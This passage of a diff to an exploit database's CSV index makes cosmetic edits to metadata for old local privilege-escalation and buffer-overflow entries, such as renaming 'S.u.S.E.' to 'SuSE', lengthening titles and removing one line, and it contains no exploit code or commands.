Hu",irix,local,0 19358,platforms/irix/local/19358.txt,"SGI IRIX 6.4 - 'xfsdump' Privilege Escalation",1997-05-07,"Yuri Volobuev",irix,local,0 
@@ -7476,8 +7494,8 @@ id,file,description,date,author,platform,type,port 19384,platforms/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x/5.0 - Buffer Overflow",1999-06-25,KSR[T],linux,local,0 19371,platforms/linux/local/19371.c,"VMware 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0 -19373,platforms/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 -19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 +19373,platforms/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E 6.1 - 'Lsof' Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 +19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E 6.1 - 'Lsof' Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion()",1999-03-08,"Fabien Royer",windows,local,0 19417,platforms/osx/local/19417.txt,"Apple Mac OS 8 8.6 - Weak Password Encryption",1999-07-10,"Dawid adix Adamski",osx,local,0 19418,platforms/aix/local/19418.txt,"IBM AIX 4.3.1 - 'adb' Denial of Service",1999-07-12,"GZ Apple",aix,local,0 
@@ -7501,22 +7519,22 @@ id,file,description,date,author,platform,type,port 19464,platforms/linux/local/19464.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 19465,platforms/linux/local/19465.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 - 'pt_chown' Privilege Escalation",1999-08-23,"Michal Zalewski",linux,local,0 -19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (1)",1999-08-30,Akke,linux,local,0 -19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (2)",1999-08-25,jbowie,linux,local,0 +19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E Linux 6.0/6.1 - Cron Buffer Overflow (1)",1999-08-30,Akke,linux,local,0 +19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E Linux 6.0/6.1 - Cron Buffer Overflow (2)",1999-08-25,jbowie,linux,local,0 19472,platforms/windows/local/19472.txt,"IBM GINA for NT 1.0 - Privilege Escalation",1999-08-23,"Frank Pikelner",windows,local,0 19473,platforms/windows/local/19473.txt,"Microsoft Internet Explorer 5 - FTP Password Storage",1999-08-25,"Makoto Shiotsuki",windows,local,0 19474,platforms/linux/local/19474.txt,"Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat 6.0 - Vixie Cron MAILTO Sendmail",1999-08-25,"Olaf Kirch",linux,local,0 19480,platforms/multiple/local/19480.c,"ISC INN 2.2 / RedHat Linux 6.0 - inews Buffer Overflow",1999-09-02,bawd,multiple,local,0 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow",1999-08-31,"Przemyslaw Frasunek",linux,local,0 19497,platforms/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",multiple,local,0 
-19498,platforms/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd'",1999-09-13,"Job de Haas of ITSX",multiple,local,0 +19498,platforms/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd' Privilege Escalation",1999-09-13,"Job de Haas of ITSX",multiple,local,0 19499,platforms/linux/local/19499.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (1)",1999-09-09,"Brock Tellier",linux,local,0 19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0 19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 / SunOS 4.1.4 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",linux,local,0 19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 - GECOS Buffer Overflow",1999-09-21,"babcia padlina ltd",freebsd,local,0 19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0/SP1-6 JET/ODBC Patch / RDS Fix - Registry Key",1999-09-21,.rain.forest.puppy,windows,local,0 -19508,platforms/linux/local/19508.sh,"S.u.S.E. Linux 6.2 sscw - HOME Environment Variable Buffer Overflow",1999-09-23,"Brock Tellier",linux,local,0 +19508,platforms/linux/local/19508.sh,"SuSE Linux 6.2 sscw - HOME Environment Variable Buffer Overflow",1999-09-23,"Brock Tellier",linux,local,0 19509,platforms/solaris/local/19509.sh,"Solaris 2.6 - Profiling File Creation",1999-09-22,"Steve Mynott",solaris,local,0 19510,platforms/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 - Authentication Socket File Creation",1999-09-17,"Tymm Twillman",linux,local,0 19511,platforms/linux/local/19511.c,"Knox Software Arkeia 4.0 - Backup Local Overflow",1999-09-26,"Brock Tellier",linux,local,0 
@@ -7539,7 +7557,7 @@ id,file,description,date,author,platform,type,port 19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0 19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)",1997-02-13,"Solar Designer",multiple,local,0 19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",multiple,local,0 -19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - 'cwdtools'",1999-10-22,"Brock Tellier",linux,local,0 +19565,platforms/linux/local/19565.sh,"SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Privilege Escalation",1999-10-22,"Brock Tellier",linux,local,0 19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Backdoor",1999-12-10,"Pauli Ojanpera",windows,local,0 19674,platforms/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program Debugging",1999-12-10,"Brock Tellier",sco,local,0 19676,platforms/linux/local/19676.c,"xsoldier (FreeBSD 3.3/Linux Mandrake 7.0) - Buffer Overflow (1)",2000-05-17,"Brock Tellier",linux,local,0 
@@ -7555,11 +7573,11 @@ id,file,description,date,author,platform,type,port 19641,platforms/sco/local/19641.c,"SCO Unixware 7.0/7.0.1/7.1 - Xsco Buffer Overflow",1999-11-25,K2,sco,local,0 19642,platforms/sco/local/19642.c,"SCO Unixware 7.0 - 'xlock(1)' 'Username' Buffer Overflow",1999-11-25,AK,sco,local,0 19643,platforms/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer Overflow",1999-10-30,K2,sco,local,0 -19647,platforms/solaris/local/19647.c,"Solaris 7.0 - 'kcms_configure'",1999-11-30,UNYUN,solaris,local,0 +19647,platforms/solaris/local/19647.c,"Solaris 7.0 - 'kcms_configure' Local Overflow / Privilege Escalation",1999-11-30,UNYUN,solaris,local,0 19648,platforms/solaris/local/19648.c,"Solaris 7.0 - CDE dtmail/mailtool Buffer Overflow",1999-11-30,UNYUN,solaris,local,0 19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 - 'gdc' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 - 'gdc' Symlink",1999-12-01,"Brock Tellier",freebsd,local,0 -19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid Dialer",1999-12-01,"Brock Tellier",freebsd,local,0 +19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon SetGID Dialer",1999-12-01,"Brock Tellier",freebsd,local,0 19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 - 'xmindpath' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 - 'angband' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0 40430,platforms/windows/local/40430.cs,"Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0 
@@ -7583,7 +7601,7 @@ id,file,description,date,author,platform,type,port 19699,platforms/linux/local/19699.txt,"Majordomo 1.94.4/1.94.5 - Local -C Parameter (1)",1999-12-29,Shevek,linux,local,0 19700,platforms/linux/local/19700.c,"Majordomo 1.94.4/1.94.5 - Local -C Parameter (2)",1999-12-29,morpheus[bd],linux,local,0 19704,platforms/multiple/local/19704.sh,"Nortel Networks Optivity NETarchitect 2.0 - PATH",1999-12-30,Loneguard,multiple,local,0 -19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 - 'midikeys'/'soundplayer'",1999-12-31,Loneguard,irix,local,0 +19706,platforms/irix/local/19706.sh,"SGI IRIX 6.2 - 'midikeys'/'soundplayer' Privilege Escalation",1999-12-31,Loneguard,irix,local,0 19707,platforms/unix/local/19707.sh,"Ascend CascadeView/UX 1.0 tftpd - Symbolic Link",1999-12-31,Loneguard,unix,local,0 19709,platforms/linux/local/19709.sh,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path (1)",2000-01-04,dildog,linux,local,0 19710,platforms/linux/local/19710.c,"Mandrake 6.x / RedHat 6.x / Turbolinux 3.5 b2/4.x/6.0.2 userhelper/PAM - Path (2)",2000-03-15,"Elias Levy",linux,local,0 
@@ -7596,13 +7614,13 @@ id,file,description,date,author,platform,type,port 19735,platforms/linux/local/19735.txt,"Debian 2.1 - apcd Symlink",2000-02-01,anonymous,linux,local,0 19739,platforms/windows/local/19739.txt,"Microsoft Windows NT 4.0 - Recycle Bin Pre-created Folder",2000-02-01,"Arne Vidstron & Nobuo Miwa",windows,local,0 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink",2000-02-15,"Shawn Bracken",sco,local,0 -19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - 'autorun.inf'",2000-02-18,"Eric Stevens",windows,local,0 -19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu'",2000-02-19,anonymous,freebsd,local,0 +19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - 'autorun.inf' Code Execution",2000-02-18,"Eric Stevens",windows,local,0 +19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Privilege Escalation",2000-02-19,anonymous,freebsd,local,0 19757,platforms/solaris/local/19757.txt,"Sun Workshop 5.0 - Licensing Manager Symlink",2000-02-21,sp00n,solaris,local,0 19762,platforms/linux/local/19762.c,"FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption",2000-02-25,"Nelson Brito",linux,local,0 19763,platforms/linux/local/19763.txt,"RedHat Linux 6.0 - Single User Mode Authentication",2000-02-23,"Darren Reed",linux,local,0 19764,platforms/linux/local/19764.txt,"Corel Linux OS 1.0 - buildxconfig",2000-02-24,suid,linux,local,0 -19765,platforms/linux/local/19765.txt,"Corel Linux OS 1.0 - 'setxconf'",2000-02-24,suid,linux,local,0 +19765,platforms/linux/local/19765.txt,"Corel Linux OS 1.0 - 'setxconf' Privilege Escalation",2000-02-24,suid,linux,local,0 19776,platforms/windows/local/19776.pl,"ZipItFast PRO 3.0 - Heap Overflow",2012-07-12,b33f,windows,local,0 19778,platforms/linux/local/19778.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (1)",2000-02-26,"Babcia 
Padlina",linux,local,0 19779,platforms/linux/local/19779.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x - 'man' Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local,0 @@ -7616,7 +7634,7 @@ id,file,description,date,author,platform,type,port 19804,platforms/linux/local/19804.pl,"AT Computing atsar_linux 1.4 - File Manipulation",2000-03-11,"S. Krahmer",linux,local,0 19811,platforms/linux/local/19811.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - 'imwheel' (1)",2000-03-13,funkysh,linux,local,0 19812,platforms/linux/local/19812.c,"Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - 'imwheel' (2)",2000-03-13,"S. Krahmer & Stealth",linux,local,0 -19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - 'kreatecd'",2000-03-16,Sebastian,linux,local,0 +19813,platforms/linux/local/19813.txt,"Halloween Linux 4.0 / SuSE Linux 6.0/6.1/6.2/6.3 - 'kreatecd' Privilege Escalation",2000-03-16,Sebastian,linux,local,0 19816,platforms/linux/local/19816.txt,"gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid",2000-03-22,"Egmont Koblinger",linux,local,0 19821,platforms/multiple/local/19821.c,"Citrix Metaframe 1.0/1.8 - Weak Encryption",2000-03-29,"Dug Song",multiple,local,0 19823,platforms/unix/local/19823.txt,"Standard & Poors ComStock 4.2.4 - Command Execution",2000-03-24,kadokev,unix,local,0 
@@ -7629,16 +7647,16 @@ id,file,description,date,author,platform,type,port 19851,platforms/qnx/local/19851.c,"QSSL QNX 4.25 A - 'crypt()' Privilege Escalation",2000-04-15,Sean,qnx,local,0 19855,platforms/windows/local/19855.txt,"Panda Security 3.0 - Multiple Vulnerabilities",2000-04-17,Zan,windows,local,0 19904,platforms/unix/local/19904.txt,"Intel Corporation NetStructure 7110 - Undocumented Password",2000-05-08,"Stake Inc",unix,local,0 -19867,platforms/linux/local/19867.txt,"S.u.S.E. Linux 6.x - Arbitrary File Deletion",2000-04-21,Peter_M,linux,local,0 +19867,platforms/linux/local/19867.txt,"SuSE Linux 6.x - Arbitrary File Deletion",2000-04-21,Peter_M,linux,local,0 19872,platforms/solaris/local/19872.c,"Solaris 2.6/7.0 - 'lpset -r' Buffer Overflow (1)",2000-04-24,DiGiT,solaris,local,0 19873,platforms/solaris/local/19873.c,"Solaris 2.6/7.0 - 'lpset -r' Buffer Overflow (2)",2000-04-24,"Theodor Ragnar Gislason",solaris,local,0 19874,platforms/solaris/local/19874.c,"Solaris 2.6/7.0 - 'lpset -r' Buffer Overflow (3)",2000-04-24,"Theodor Ragnar Gislason",solaris,local,0 19875,platforms/immunix/local/19875.txt,"PostgreSQL 6.3.2/6.5.3 - Cleartext Passwords",2000-04-23,"Robert van der Meulen",immunix,local,0 19876,platforms/solaris/local/19876.c,"Solaris 7.0/8 - Xsun Buffer Overrun",2000-04-24,DiGiT,solaris,local,0 19878,platforms/solaris/local/19878.c,"Solaris 2.6/7.0 - lp -d Option Buffer Overflow",2000-04-24,DiGiT,solaris,local,0 -19883,platforms/linux/local/19883.c,"S.u.S.E. 
Linux 6.3/6.4 Gnomelib - Buffer Overflow",2000-04-29,bladi,linux,local,0 +19883,platforms/linux/local/19883.c,"SuSE Linux 6.3/6.4 Gnomelib - Buffer Overflow",2000-04-29,bladi,linux,local,0 19894,platforms/windows/local/19894.txt,"Aladdin Knowledge Systems eToken 3.3.3 - eToken PIN Extraction",2000-05-04,kingpin,windows,local,0 -19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 - 'pam_console'",2000-05-03,"Michal Zalewski",linux,local,0 +19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 - 'pam_console' Monitor Activity After Logout",2000-05-03,"Michal Zalewski",linux,local,0 19910,platforms/solaris/local/19910.c,"Solaris 2.6/7.0/8 - 'netpr' Buffer Overflow (1)",1999-05-23,ADM,solaris,local,0 19911,platforms/solaris/local/19911.c,"Solaris 2.6/7.0/8 - 'netpr' Buffer Overflow (2)",1999-03-04,ADM,solaris,local,0 19912,platforms/multiple/local/19912.txt,"Netscape Communicator 4.5/4.51/4.6/4.61/4.7/4.72/4.73 - '/tmp' Symlink",2000-05-10,foo,multiple,local,0 
@@ -7647,9 +7665,9 @@ id,file,description,date,author,platform,type,port 19930,platforms/windows/local/19930.rb,"Microsoft Windows - Task Scheduler '.XML' Privilege Escalation (MS10-092) (Metasploit)",2012-07-19,Metasploit,windows,local,0 19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 < 2.6.30.4 - 'Sendpage' Privilege Escalation (Metasploit)",2012-07-19,Metasploit,linux,local,0 19946,platforms/linux/local/19946.txt,"OpenLDAP 1.2.7/1.2.8/1.2.9/1.2.10 - '/usr/tmp/' Symlink",2000-04-21,anonymous,linux,local,0 -19952,platforms/linux/local/19952.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0 -19953,platforms/linux/local/19953.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0 -19954,platforms/linux/local/19954.c,"S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (3)",2000-05-22,WaR,linux,local,0 +19952,platforms/linux/local/19952.c,"S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (1)",2000-05-22,"Paulo Ribeiro",linux,local,0 +19953,platforms/linux/local/19953.c,"S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (2)",2000-05-22,Scrippie,linux,local,0 +19954,platforms/linux/local/19954.c,"S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (3)",2000-05-22,WaR,linux,local,0 19955,platforms/linux/local/19955.c,"Cobalt RaQ 2.0/3.0 / qpopper 2.52/2.53 - 'EUIDL' Format String Input",2000-05-24,Prizm,linux,local,0 19967,platforms/multiple/local/19967.txt,"Omnis Studio 2.4 - Weak Database Field Encryption",2000-05-25,Eric.Stevens,multiple,local,0 19968,platforms/windows/local/19968.c,"Microsoft Windows Server 2000/95/98/NT 4.0 
- Long Filename Extension",2000-04-21,"Laurent Eschenauer",windows,local,0 @@ -7684,7 +7702,7 @@ id,file,description,date,author,platform,type,port 20053,platforms/windows/local/20053.py,"MyMp3 Player Stack - '.m3u' File DEP Bypass",2012-07-23,"Daniel Romero",windows,local,0 20056,platforms/unix/local/20056.c,"Visible Systems Razor 4.1 - Password File (1)",2000-06-16,pbw,unix,local,0 20058,platforms/unix/local/20058.pl,"Visible Systems Razor 4.1 - Password File (2)",2000-06-15,"Shawn A. Clifford",unix,local,0 -20073,platforms/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 - Insecure perl 'open'",2000-07-12,"Joey Hess",unix,local,0 +20073,platforms/unix/local/20073.txt,"CVSWeb Developer CVSWeb 1.80 - Insecure Perl 'open' Code Execution",2000-07-12,"Joey Hess",unix,local,0 20081,platforms/windows/local/20081.c,"NetZero ZeroPort 3.0 - Weak Encryption Method",2000-07-18,"Brian Carrier",windows,local,0 20092,platforms/cgi/local/20092.txt,"Sean MacGuire Big Brother 1.0/1.3/1.4 - CGI File Creation",2001-06-11,xternal,cgi,local,0 20093,platforms/linux/local/20093.c,"Stanley T. Shebs Xconq 7.2.2 - xconq Buffer Overflow",2000-06-22,V9,linux,local,0 
@@ -7735,7 +7753,7 @@ id,file,description,date,author,platform,type,port 20265,platforms/windows/local/20265.txt,"Microsoft Windows NT 4.0/2000 - Spoofed LPC Request (MS00-003)",2000-10-03,"BindView's Razor Team",windows,local,0 20274,platforms/multiple/local/20274.pl,"IBM Websphere 2.0/3.0 - ikeyman Weak Encrypted Password",1999-10-24,"Ben Laurie",multiple,local,0 20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions",2000-10-10,@stake,solaris,local,0 -20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart'",2000-10-10,@stake,solaris,local,0 +20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart' Privilege Escalation",2000-10-10,@stake,solaris,local,0 20285,platforms/linux/local/20285.c,"RedHat 6.2/7.0 Tmpwatch - Arbitrary Command Execution",2000-10-06,X-Force,linux,local,0 20290,platforms/aix/local/20290.txt,"AIX 3.x - bugfiler Arbitrary File Creation",1997-09-08,"Johannes Schwabe",aix,local,0 20291,platforms/linux/local/20291.sh,"Elm 2.4 - 'filter' Arbitrary Mail Disclosure",1995-12-26,"David J Meltzer",linux,local,0 
@@ -7795,7 +7813,7 @@ id,file,description,date,author,platform,type,port 20581,platforms/linux/local/20581.c,"Mysql 3.22.x/3.23.x - Local Buffer Overflow",2001-01-18,"Luis Miguel Silva",linux,local,0 20585,platforms/windows/local/20585.txt,"LocalWEB2000 1.1 - Directory Traversal",2001-01-22,"SNS Research",windows,local,0 20603,platforms/solaris/local/20603.c,"Solaris 7/8 - ximp40 Library Buffer Overflow",2001-01-31,UNYUN,solaris,local,0 -20604,platforms/linux/local/20604.sh,"Debian 2.2 / S.u.S.E 6.3/6.4/7.0 - man '-l' Format String",2001-01-31,IhaQueR,linux,local,0 +20604,platforms/linux/local/20604.sh,"Debian 2.2 / Su.S.E 6.3/6.4/7.0 - man '-l' Format String",2001-01-31,IhaQueR,linux,local,0 20621,platforms/unix/local/20621.txt,"Micro Focus Cobol 4.1 - Arbitrary Command Execution",2001-02-12,"Dixie Flatline",unix,local,0 20626,platforms/linux/local/20626.c,"Linux Kernel 2.2.x - 'sysctl()' Memory Reading (PoC)",2001-02-09,"Chris Evans",linux,local,0 20645,platforms/linux/local/20645.c,"Elm 2.5.3 - Alternative-Folder Buffer Overflow",2001-02-13,_kiss_,linux,local,0 
@@ -7834,7 +7852,7 @@ id,file,description,date,author,platform,type,port 40422,platforms/windows/local/40422.txt,"NetDrive 2.6.12 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,windows,local,0 20822,platforms/linux/local/20822.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (1)",2001-05-07,"Sebastian Krahmer",linux,local,0 20823,platforms/linux/local/20823.sh,"Vixie Cron crontab 3.0 - Privilege Lowering Failure (2)",2001-07-05,cairnsc,linux,local,0 -20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow",2001-05-13,"zenith parsec",linux,local,0 +20843,platforms/linux/local/20843.txt,"Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / SuSE Linux 6.x/7.0/7.1 - 'Man -S' Heap Overflow",2001-05-13,"zenith parsec",linux,local,0 20851,platforms/sco/local/20851.txt,"SCO OpenServer 5.0.x - StartX Weak XHost Permissions",2001-05-07,"Richard Johnson",sco,local,0 20861,platforms/win_x86-64/local/20861.txt,"Microsoft Windows Kernel - Intel x64 SYSRET (MS12-042) (PoC)",2012-08-27,"Shahriyar Jalayeri",win_x86-64,local,0 20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client - asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 
@@ -7912,8 +7930,8 @@ id,file,description,date,author,platform,type,port 21139,platforms/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 - Client Importer Buffer Overflow (Metasploit)",2012-09-08,Metasploit,windows,local,0 40418,platforms/windows/local/40418.txt,"Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation",2016-09-23,Tulpa,windows,local,0 21150,platforms/unix/local/21150.c,"Rational ClearCase 3.2/4.x - DB Loader TERM Environment Variable Buffer Overflow",2001-11-09,virtualcat,unix,local,0 -21158,platforms/linux/local/21158.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String",2001-11-21,IhaQueR@IRCnet,linux,local,0 -21159,platforms/linux/local/21159.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Buffer Overflow",2001-11-21,IhaQueR@IRCnet,linux,local,0 +21158,platforms/linux/local/21158.c,"SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String",2001-11-21,IhaQueR@IRCnet,linux,local,0 +21159,platforms/linux/local/21159.c,"SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Buffer Overflow",2001-11-21,IhaQueR@IRCnet,linux,local,0 21173,platforms/windows/local/21173.pl,"McKesson Pathways Homecare 6.5 - Weak 'Username' and Password Encryption",2001-12-07,shoeboy,windows,local,0 21176,platforms/freebsd/local/21176.c,"FreeBSD 4.4 - AIO Library Cross Process Memory Write",2001-12-10,"David Rufino",freebsd,local,0 40417,platforms/windows/local/40417.txt,"Wise Care 365 4.27 / Wise Disk Cleaner 9.29 - Unquoted Service Path Privilege Escalation",2016-09-23,Tulpa,windows,local,0 
@@ -8198,7 +8216,7 @@ id,file,description,date,author,platform,type,port 23096,platforms/windows/local/23096.txt,"Microsoft WordPerfect - Converter Buffer Overrun",2003-09-03,valgasu,windows,local,0 23119,platforms/linux/local/23119.c,"Apache::Gallery 0.4/0.5/0.6 - Insecure File Storage Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 23126,platforms/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 -23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' REMOTE_ADDR Authentication Bypass",2003-09-15,Texonet,sco,local,0 +23141,platforms/sco/local/23141.sh,"SCO OpenServer 5.0.x - 'mana' 'REMOTE_ADDR' Authentication Bypass",2003-09-15,Texonet,sco,local,0 23143,platforms/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation",2003-09-15,Texonet,sco,local,0 23154,platforms/linux/local/23154.c,"Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun",2003-09-17,"Gyan Chawdhary",linux,local,0 23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Escalation",2003-09-22,"Sebastian Krahmer",linux,local,0 
@@ -8245,7 +8263,6 @@ id,file,description,date,author,platform,type,port 23682,platforms/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0 23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,linux,local,0 23739,platforms/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Privilege Escalation",2004-02-22,"Ian Vitek",windows,local,0 -23740,platforms/linux/local/23740.c,"Samhain Labs 1.x - HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0 23743,platforms/linux/local/23743.txt,"Platform Load Sharing Facility 4/5/6 - 'EAuth' Privilege Escalation",2003-02-23,"Tomasz Grabowski",linux,local,0 23759,platforms/linux/local/23759.pl,"MTools 3.9.x - 'MFormat' Privilege Escalation",2004-02-25,"Sebastian Krahmer",linux,local,0 23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - '.PLF' File (ASLR + DEP Bypass) (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0 
